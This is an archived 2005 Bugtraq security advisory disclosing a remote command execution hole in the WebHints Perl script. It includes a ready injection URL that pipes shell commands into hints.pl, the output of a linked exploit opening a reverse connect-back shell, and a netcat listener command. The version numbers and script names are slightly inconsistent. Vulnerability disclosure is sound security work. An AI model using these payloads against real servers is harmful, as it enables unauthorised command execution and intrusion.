| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 15 Jun 2005 02:41:39 +0200 From: "Emanuele \"MadSheep\" Gentili" <emanuele@...ietolug.org> To: "'Emanuele \"MadSheep\" Gentili'" <emanuele@...ietolug.org>, <burgdorf@...d.com>, <submit@...w0rm.com>, <submissions@...ketstormsecurity.org>, <bugtraq@...urityfocus.com>, <Exploits@...irt.com> Subject: MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability 06/11/2005 MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command Execution Vulnerability Published: 06 11 2005 Released: 06 11 2005 Name: WebHints Affected Systems: <= 1.03 Issue: Remote Command Execution Vulnerability Author: Emanuele "MadSheep" Gentili Vendor: http://awsd.com/scripts/ Description *********** Madroot Security group has discovered a flaw in WebHints <= 1.02. There is a vulnerability in the current version of WebHints. This issue occurs due to insufficient sanitization of externally supplied data to the hints.pl script that allows a remote user to pass an arbitrary shell command which will be executed by the script. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script. Details ******* It's possibile for a remote attacker to retrieve any file from a webserver and execute it. Multiple files are affected with this problem. For example try this: http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd| POF ******* Exploit: http://madsheep.altervista.org/M4DR007-hints.pl emanuele@...ckbox:~$ perl new.pl ~~ www.madroot.edu.ms Security Group ~~ WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: <= all ~~ code by MadSheep ~~ 06.11.2005 hostname: localhost port: (default: 80) 80 path: (/cgi-bin/) /cgi-bin/ your ip (for reverse connect): 127.0.0.1 your port (for reverse connect): 7350 ~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~ [*] try to exploiting... [*] OK! [*] NOW, run in your box: nc -l -vv -p 7350 [*] starting connect back on 127.0.0.1 :7350 [*] DONE! [*] Look netcat windows and funny ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WARNING - WARNING - WARNING - WARNING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If connect back shell not found: - you do not have privileges to write in /tmp - Shell not vulnerable We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk emanuele@...ckbox:~$ emanuele@...ckbox:~$ nc -l -vv -p 7350 uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep) enJoy Solution ********* The vendor has been contacted and a patch was not yet produced. Credits ******* Emanuele "MadSheep" Gentili - emanuele@...ietolug.org - www.madsheep.edu.ms Come cheer us at #madroot on Freenode ( irc.freenode.net ) (C) 2004 Copyright by madroot Security Group Download attachment "M4DR007-hints.pl" of type "application/octet-stream" (3446 bytes) View attachment "MADSHEEP-05SA-hints.txt" of type "text/plain" (2524 bytes)
Powered by blists - more mailing lists